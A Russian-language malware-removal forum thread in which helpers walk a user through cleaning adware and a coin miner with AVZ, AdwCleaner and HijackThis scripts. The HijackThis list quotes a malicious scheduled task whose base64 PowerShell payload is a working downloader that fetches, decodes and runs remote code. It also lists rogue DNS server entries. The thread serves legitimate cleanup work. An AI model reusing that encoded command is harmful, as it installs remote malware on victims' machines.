Выскакивает и пропадает окно cmd.exe [not-a-virus:HEUR:AdWare.Win32.Generic, not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen ]

**Salex m** · 05.01.2018, 23:26

Добрый день!
Начала самопроизвольно выскакивать командная строка и быстро пропадать. При этом каждый раз создает в папке "Temp" новую папку с примерным названием "B15A7EBA-6940BB12-EEDB27B4-798C0003", в которой находиться файл "nsetup.exe".

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 05.01.2018, 23:27

Уважаемый(ая) Salex m, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**Vvvyg** · 08.01.2018, 13:10

Выполните скрипт в AVZ:

Код:

begin
 TerminateProcessByName('c:\programdata\{e85d2c27-5ff6-9b8c-4c0b-6347316e8219}\cd6db7a8-7ac6-0003-2afa-4a8f7e5c3d36.exe');
 QuarantineFile('C:\PROGRA~3\9e30f7d2\aefeb61f.dll', '');
 QuarantineFile('c:\programdata\{e85d2c27-5ff6-9b8c-4c0b-6347316e8219}\cd6db7a8-7ac6-0003-2afa-4a8f7e5c3d36.exe', '');
 QuarantineFile('C:\Users\Pavilion\AppData\Local\A5EAA1~1\{AEFEB~1', '');
 QuarantineFile('C:\Users\Pavilion\AppData\Local\A5EAA1~1\{AEFEB~1.', '');
 QuarantineFile('C:\Users\Pavilion\AppData\Roaming\mysites123\UninstallManager.exe', '');
 QuarantineFile('C:\Windows\SysWOW64\regsvr32.exe  /n /s /i:"/259aa228f4028ed7 /q" "C:\Users\Pavilion\AppData\Local\A5EAA1~1\{AEFEB~1."', '');
 QuarantineFile('dnslockington.exe', '');
 DeleteFile('C:\PROGRA~3\9e30f7d2\aefeb61f.dll', '32');
 DeleteFile('c:\programdata\{e85d2c27-5ff6-9b8c-4c0b-6347316e8219}\cd6db7a8-7ac6-0003-2afa-4a8f7e5c3d36.exe', '32');
 DeleteFile('C:\Users\Pavilion\AppData\Local\A5EAA1~1\{AEFEB~1', '32');
 DeleteFile('C:\Users\Pavilion\AppData\Local\A5EAA1~1\{AEFEB~1.', '32');
 DeleteFile('C:\Users\Pavilion\AppData\Roaming\mysites123\UninstallManager.exe', '32');
 DeleteFile('C:\Windows\system32\regsvr32.exe  /s /n /i:"/rt" "C:\PROGRA~3\9e30f7d2\aefeb61f.dll"', '32');
 DeleteFile('C:\Windows\SysWOW64\regsvr32.exe  /n /s /i:"/259aa228f4028ed7 /q" "C:\Users\Pavilion\AppData\Local\A5EAA1~1\{AEFEB~1."', '32');
 DeleteFile('dnslockington.exe', '32');
 ExecuteFile('ipconfig.exe', '/flushdns', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "{0B7D7947-090F-7D05-7F11-0C09790D117A}" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "{BBAEAC99-0C05-1B32-966C-6C50B0310937}" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "{DA689782-F597-66D5-21B2-DEA8DD8A6551}" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "{E34BF322-EAB2-49B6-B653-E275DD44A137}" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "{EA7359AC-05E1-F7B9-CBCE-E42B1A50511C}" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "BA12CDE0-EA73-7EBC-202E-E46A43CD6E60" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "DNSLOCKINGTON" /F', 0, 15000, true);
 DeleteFileMask('c:\progra~3\9e30f7d2', '*', true);
 DeleteFileMask('c:\programdata\{e85d2c27-5ff6-9b8c-4c0b-6347316e8219}', '*', true);
 DeleteFileMask('c:\users\pavilion\appdata\local\a5eaa1~1', '*', true);
 DeleteFileMask('c:\users\pavilion\appdata\roaming\mysites123', '*', true);
 DeleteFileMask('c:\windows\system32\regsvr32.exe  /s /n /i:"/rt" "c:\progra~3\9e30f7d2', '*', true);
 DeleteFileMask('c:\windows\syswow64\regsvr32.exe  /n /s /i:"/259aa228f4028ed7 /q" "c:\users\pavilion\appdata\local\a5eaa1~1', '*', true);
 DeleteDirectory('c:\progra~3\9e30f7d2');
 DeleteDirectory('c:\programdata\{e85d2c27-5ff6-9b8c-4c0b-6347316e8219}');
 DeleteDirectory('c:\users\pavilion\appdata\local\a5eaa1~1');
 DeleteDirectory('c:\users\pavilion\appdata\roaming\mysites123');
 DeleteDirectory('c:\windows\system32\regsvr32.exe  /s /n /i:"/rt" "c:\progra~3\9e30f7d2');
 DeleteDirectory('c:\windows\syswow64\regsvr32.exe  /n /s /i:"/259aa228f4028ed7 /q" "c:\users\pavilion\appdata\local\a5eaa1~1');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteRepair(1);
 ExecuteRepair(21);
 ExecuteWizard('SCU', 2, 2, true);
RebootWindows(true);
end.

Компьютер перезагрузится.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Сделайте новый лог Autologger.

Сделайте лог Malwarebytes AdwCleaner.

**Salex m** · 24.01.2018, 23:21

Выполнил. Извиняюсь, что задержался. Проблема еще актуальна.
В какой-то период пропадала.
Плюс появилась проблема "выскакивания новой посторонней вкладки на каждый клик в браузере".

**Vvvyg** · 25.01.2018, 07:02

Удалите всё найденное в AdwCleaner, дождитесь окончания удаления и перезагрузите систему по требованию программы.
После входа в систему откроется отчёт AdwCleaner - файл AdwCleaner[C1].txt, прикрепите к своему следующему сообщению.

Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)) и пофиксите всё, что есть из списка:

Код:

R0 - HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command,(default) = C:\Program Files\Internet Explorer\iexplore.exe http://www.mysites123.com/?type=sc&ts=1449580358&z=aced479f086058457743efcg5z6zet2w0b1eec9wcb&from=amt&uid=TOSHIBAXMK6476GSX_X17VT646TXXX17VT646T
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O4-32 - HKLM\..\Run: [tim] c:\users\pavilion\appdata\roaming\tim  (file missing)
O17 - HKLM\System\CCS\Services\Tcpip\..\{08552722-B735-455B-9BB4-4701C6D6E5ED}: NameServer = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{08552722-B735-455B-9BB4-4701C6D6E5ED}: NameServer = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\..\{40362522-DC6E-4760-A496-235E64A0DD04}: NameServer = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{40362522-DC6E-4760-A496-235E64A0DD04}: NameServer = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\..\{9FE84881-4E6D-492D-AE78-B2F955ECBDEA}: NameServer = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{9FE84881-4E6D-492D-AE78-B2F955ECBDEA}: NameServer = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\..\{F197600D-E281-4F31-B90A-AE5446803A52}: NameServer = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{F197600D-E281-4F31-B90A-AE5446803A52}: NameServer = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: NameServer = 82.163.143.176 82.163.142.178
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{08552722-B735-455B-9BB4-4701C6D6E5ED}: NameServer = 82.163.142.178
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{08552722-B735-455B-9BB4-4701C6D6E5ED}: NameServer = 82.163.143.176
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{40362522-DC6E-4760-A496-235E64A0DD04}: NameServer = 82.163.142.178
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{40362522-DC6E-4760-A496-235E64A0DD04}: NameServer = 82.163.143.176
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9FE84881-4E6D-492D-AE78-B2F955ECBDEA}: NameServer = 82.163.142.178
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9FE84881-4E6D-492D-AE78-B2F955ECBDEA}: NameServer = 82.163.143.176
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{F197600D-E281-4F31-B90A-AE5446803A52}: NameServer = 82.163.142.178
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{F197600D-E281-4F31-B90A-AE5446803A52}: NameServer = 82.163.143.176
O17 - HKLM\System\ControlSet002\Services\Tcpip\Parameters: NameServer = 82.163.143.176 82.163.142.178
O22 - Task: {0B7D7947-090F-7D05-7F11-0C09790D117A} - C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgADsAOwAgACAAIAA7ACAAOwAgADsAIAAgACAAIAA7ACAAIAA7ACAAOwA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABWAGUAcgBiAG8AcwBlAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQARABlAGIAdQBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7AAoAZgB1AG4AYwB0AGkAbwBuACAAWABDAEwAVgBUAFYAVQBXAFYAQQAoACQAcAApAHsAJABuAD0AIgBXAGkAbgBkAG8AdwBQAG8AcwBpAHQAaQBvAG4AIgA7AHQAcgB5AHsATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewAgAH0AdAByAHkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0AVgBhAGwAdQBlACAAMgAwADEAMwAyADkANgA2ADQAfABPAHUAdAAtAE4AdQBsAGwAOwA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewA7AH0ACgB9AAoAfQBYAEMATABWAFQAVgBVAFcAVgBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXwB2ADEALgAwAF8AcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAKQA7AFgAQwBMAFYAVABWAFUAVwBWAEEAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiACkAOwBYAEMATABWAFQAVgBVAFcAVgBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAbABpAHAAYQByAHIAYQB5AC4AaQBuAGYAbwAvAHUALwA/AGEAPQBkAHkATAA1AEsALQB5AEwARwBtAHEAcABqADUAbQB0AFkARABLADAAQwAxAEkARQB6ADcAVgBLAHkAQgBUAG4AMABBAHgAWAB4AEIAZgA5AFQAcgBNAEkAeABoAHIAVQBkAGUAQgBLAE0AdABhAHAAagA4AEIAQQBoADYAXwBIADIASwBXAFQAZQB6AEcAegBsAG8AUQBqADcAVwBNAHUAegAyAHAANABwAGIAdgBUADEAcgB2AHUAUwBoADEAbwBjAHkAbABOAEYARwBOAGMAawBaAHQATwBsAGoAawBUADQARABkAGwAQgAwAGkAQwAwAE8AWgB2AGQATABaAFoAYgB3ADQAcgBhAFAAWgA3AFMAVQA4ADYAVwBKAGgARwBqAEsAbQA3AG0ARwBpADkANgBqAGgAZwA3ADYARwBYAEUAegBrAFoAaQBLAFAARABDAHMASQA1AHkASwAyAG4ANABwAE4ARQBWAFkAYgBzAC0AZQA3AGkAbwBoADAANABIADEAeQB3AG8AcABMADUARQB6AGEAaQAxAHIAZgB3AEgARABSAE8ATQBEAHQAMQBOAEEAVgBiAGYAaQBSAE0ARgB2ADAAaQBHADEAZAAwAEwAaABIAGEAegBiADkAbQBZAHMAZAAzAEIAQgBIAFAAWQBfAHgAagB2ADcAZQBrAGgANgBTAEQAegBpAFMALQB5ADUAVABFAEsAYQBYAFEAOABMAEYAeABpAGsAVQBJADgAZgBXAFYAeAB0AFgAbgA2AEYAVwA3AEYAYgBzAEoAUQAxAE4AUgAzAGkANgBaAGUAaAByAGIAQwBqAHYAdQBtAGoARQBMAE8AWABHAE0AOAAtADMARABVAHYATQBIAFkATwBVAFQAXwBLAGYAaQBBADkAUgA4AEoAaAA4AE0AawBEAEMAWQB3AEEARgBaAEQANQBTAHYAXwA0AGEASwBiAFMAQwAxAEsAOQB1AHcAWgA1AHYAQwB3AEMAcAA5AEMAcwAtAGsAQwB6AEkAbwB1AGgAaABIAFoAUwB4AGgAMwA4AFYARQBNAG4ATQBTAGsAQwB1ADAAUQBJAHoAeQBXAHgAZwBrAHcASQBMADQASQBnAHIARABPAFMAXwBaAC0AdgB4AFgALQA2ADUAagBVAEoASgBEAEEASgB1AFAAawBBAHAAZQBlAG0AYQBtAGwAcwBJAHQAcwBCAHgARgB5AHAAbAAyAHAANQByAEIAZgBuAG4AUAB4AEIAQQBrAHoAVwBpAGUAMQBkAFAAbwBPAFUANABhAF8AdQBhAFAATQAxAGoAcwB0AGoAZwByADYAUgBLADkAbQBtAHEAdAB4AG8AUwB0ADAAbwBoADAAUwB3AFIASQBhAEYAOABPAGYANwA5AFIAeAB5AG0ANgA1AHMAMABqAEwAdwBHAFMATwBIAFkASQA3AGUAbwByAG8AQQBMAGgAbwBqAE4AUgBmAE0AdgBFAE0AdgBJAHMASQAwAE4AOABWAHMAZABBAHMAQQBoAHUAMwBLAGUAaAB5AGEAdgB0AFEAMABsAFQAYwBLADMARQAzAEkAZABnAEIAXwBGADQAQwBiAHAAbwAzAFYAZgBsAFgAQwA4AHoAbQBTAEIAQwBWAE0AQgBYAG4AagA5AGQASABRAEUAOAA2AHoAUgBBAGgAdAAyAFAANABwAGoAYQBLAEMASABXAFEAZgBrAGQARgAwAFIAYgBCAHUAVABBAHUARgBlAEQAWABGAFkASwB3AFoANgBkAHUASgBGAG4AVAA2AHkAYQBGAGYAZgBmAG8AcgBRADEAMgA5AG0AeQBzADcATQAwAG8AXwA2AGIATgAyAHQATQBaAGcARgA5AGMAMQB5AEQAVwB0AG0AbgAxAFgAXwBZAFYAcwBPAFUALQBpAHoAbQAtAC0AdQBJAGUASQB4ADAANgB1ADYAZwB0AFcAaQBzAGgAXwBoAGcANgBQADIANQBKAFcAUABMAE4AcgBRADIAcAA3AFoAVgBwAHMARABwAGEAUwAtAG8ARgBBAFIANQBEAGUAMwBBAE4ARgA5AGQAcQBXAGIASQBVAFoAUgByAFQAOABNADgATwBRAGwAdABkADUASQAtAFIAbQBRADQAbQBsAHIAUABpAG8AXwBUADkAeQBJAGMAQQBxAGYASQBJAFEAZABQAEgARQByAFIAaABTAHQAYQBEAEYATQBIAG0AUgBCAEoAVgBqAEQAZQBCAFUASAB1AHYAOABlADEAVwBTAGsAWABsAEQALQBBADYAcQBjAGQAOABHADkAWAB3AFoASAB1AFYAcgA4AHQAaAA1AHAANgBIADAANgBpAE8AVQBkADgANABrAGcAWgBsAGMAVAB1AFQAeQAtAGMAWABGAGEAVABpAHMAegBTAE8ASwA5ADMAcQBnAHQAbABwAHoAbABJAC0ANwBwAG0ATQBCADkAQwBWAE4AYQB1AHEAVQBnADMASQBaADEANwB0AEcATABsAHcAcAAzAC0AagBNAFcARQBYAGoAQQBQAGUAUQBuAE0AQgB6ADcAegAzADAASAA3AFkASABaAFIARQB6AHYAdQB4AGwAZwBGAE4AaABzAEkAcgBuAG8AdABsAFIAJgBjAD0AaQBtAEwAaQBUAHkAVgA3ADMAdwBhAEEANwBaAEkAUQBPAFEAUABDAGgATQBIAHkAYQB5AGsAdAB5AEIAZQBxAFMATABfAC0AeQB2AEMAcQB0ADkAWAA1AGgAegBBAGMAQQBQAEMAVwBpAGUAQgBnAHMAeABCAGUAbwBmADgATgBUADkAOQAwAGQAWgBtAG0AZQB2AG4ASQBPAFoAQgAxAE0AbgBGAFMAMwBOAEIAagBVAFIANAAxAEYARABhAHcAawB4ADIAZQBXAHQAVQB3AGMAQQBFAE8ASgAxAFEAVgBBAEIASwBFAE0AYgBxAFgAeAAtAEEAYwBCADUARgBoADcAYQAtAG4AUABoAEMAcQA0AGYAVwBHAEoAOABxAGsAWABhAGsAQgBrAHoARgA1ADgAZgB4AEgAWQBzAFEANgB1AGUASAByAG0AQgBFAEYAVgBfAGUAYgBOAEMASAA1AHIAZgBKAEcAdAB1ADYAdwBaAHIANQBWAFoANgBOAGkAbgBGAFoARAB5AHAASgByAHoAUwA4AGoAawBEAFcALQBZAGoAZwB1AG8AVgBKAEsAawBYAFoAWABOADYANAByADQAZgBBAEsAbgAzAHMARABDAFgAcABzAHIAQQB3ADQAVABvAHcAMgBzAEsASgA5AGgAaQBHAEoAbQBaAC0ASQA5AHUANABsAEkASgBJAE4ASwBvAG0ATwBXAHUAZwB0AGwAZABjAFMAVABPAFgAbgBzAGoASABnAFcAOQB0AEMAVwBHAFMAOAA4AEsASQA5AE0ASgA1AG0AZwBVAGoAbQBQADQAagBfAGUAZgB5AEYASQByAGYAVQBDAGUAcwA1AHkAVABWAGcATQA4ADMAaABlAHkANABmAEEAYQBzAHcASwBPAGsAOAA0AE0ANgBIAEkAZQBKAFEAQwBvADMAMwBPAF8ATQBCADAAVwA2AG8AdgB2AFQAawA3AGwANQBqAFQANwA3AHIAMgBrAG8ANAA0AHIAbwBUADQAawBSAFIANQBZAEQAVgBnAEkAbABJADMANQBYAGYAbQBFAEIAcwA5ADgAbQBtADgAQgBnADIASwBvAHEAegBWAHMATABiAFIATgBGAGkAcwBIAHUAcQBWAEQAbABqAGIARQBoAEMALQA0AFQAOQA3AEEAZwBmAHQAawBUAGoAMgA1AFIAcwAxAFkAMwBMAG0ASQBjAG0AMgBBAHUATgBfADkAcAA2AGIASwBPAEQAUQBFAHUAYwA1AFAAOQBzAG8AdwBQAC0ANwBzAEYAZQBYAEEAUgBzAGYAQgBFADgAVQBZAGQANgAtADEAMgBmAGgAbABJAHUAQgA0AGEAVwB0AHoAdwBEAEEAdABiAEEANgAyAGsAUQBlADkAUQBqAFoANABrAFIAVQBPAFkALQBSAHUAbgBMAFkAZAAxADcAYQBSAFEAagBKAFkALQBSAEoAOQAtADMAcQBWAG8AdABlAEUAYwB0AEYAdwBZAHkAVAA5AGcAOAA1ADYAOABvAGIATwBYAEwAUgB4ADMAQgBlAGgAbQB6AE8AVQBEAFMASwBrAG4AcgBTAHoAMQBQAGEANgB1AEYAcABSADQAWQBBAFAAOQBQAG4AVgBoAFYATABNAEgAWQAtAE8AVQBnAGgAVABTADQAZAA5AE0ASQBmAFkAYwA0AHoARABIAFMAVwBNADcAeQBJAG0AWgBEADEAcAB3AGIAZABqAEcAVgBBAEEAdAB0AFUANAB2AGEAQwBxAG4AbQB2ADkAVABQAEQAeABRAE0AUwBVAE8AUQB3AEQANABtADIAMAA0AGcAYgA4AF8ASQBmADAANgA0AFgAVABaAFYAVwBJAFgAZwBYAF8ATQBCAEEAbgBJAF8AMgBGAE0AdABaAHcAdgBBAGkANwBUAC0AVABTAGQAaABkAGYAbwB6ADkARQBIAHkANgBtAGIAcwBrAG8AUABXAG4AegBCAFgATABSAGkAQQB5AGEAWABxAFMATQBjADIAbQAtAHMAbwBsADAAcABtAG8ATQBDAG8ANQBXAEEAegBXAFAANQBUAGQATwBJADgAegB6AFUAawBhAFUAQQBGADUAUwA0ADMAdwBMADEAcgA4ADkARABFAHUAQwBJAGwAaABtAC0AMABtAEEASwBhAHAAZQA0AGEAMgBtAEQAUQBmADQAMABCAGsALQBEAEMASABkAFcAJgByAD0AMQAyADcAOQA5ADAAMAA4ADgAMwAzADIANAA0ADkAMgA0ADAANQAiADsAJABzAHQAcwBrAD0AIgB7ADAAQgA3AEQANwA5ADQANwAtADAAOQAwAEYALQA3AEQAMAA1AC0ANwBGADEAMQAtADAAQwAwADkANwA5ADAARAAxADEANwBBAH0AIgA7ACQAcAByAGkAZAA9ACIAZgBsAG8AYQB0AGkAbgBnACIAOwAkAGkAbgBpAGQAPQAiAFoAUQBZAFIAVwBZAFoATgAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAIAB9ADsAfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AAoAfQAKAGYAdQBuAGMAdABpAG8AbgAgAEEASABBAEcARABVAE8AQgAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAEQAQQBSAEYAQwAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwAgAH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAOwB9AAoAJABzAGMAPQBEAEEAUgBGAEMAKABBAEgAQQBHAEQAVQBPAEIAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewA7AH0AOwBlAHgAaQB0ACAAMAA7AA==
O22 - Task: {EA7359AC-05E1-F7B9-CBCE-E42B1A50511C} - C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\9e30f7d2\aefeb61f.dll"

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

**CyberHelper** · 25.01.2018, 07:12

Статистика проведенного лечения:

Получено карантинов: 1
Обработано файлов: 3
В ходе лечения обнаружены вредоносные программы:
1. c:\progra~3\9e30f7d2\aefeb61f.dll - not-a-virus:HEUR:AdWare.Win32.Generic
2. c:\users\pavilion\appdata\local\a5eaa1~1\{aefeb~1 - not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen
3. c:\users\pavilion\appdata\local\a5eaa1~1\{aefeb~1. - not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen

Выскакивает и пропадает окно cmd.exe [not-a-virus:HEUR:AdWare.Win32.Generic, not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen ] (заявка № 217016)

Опции темы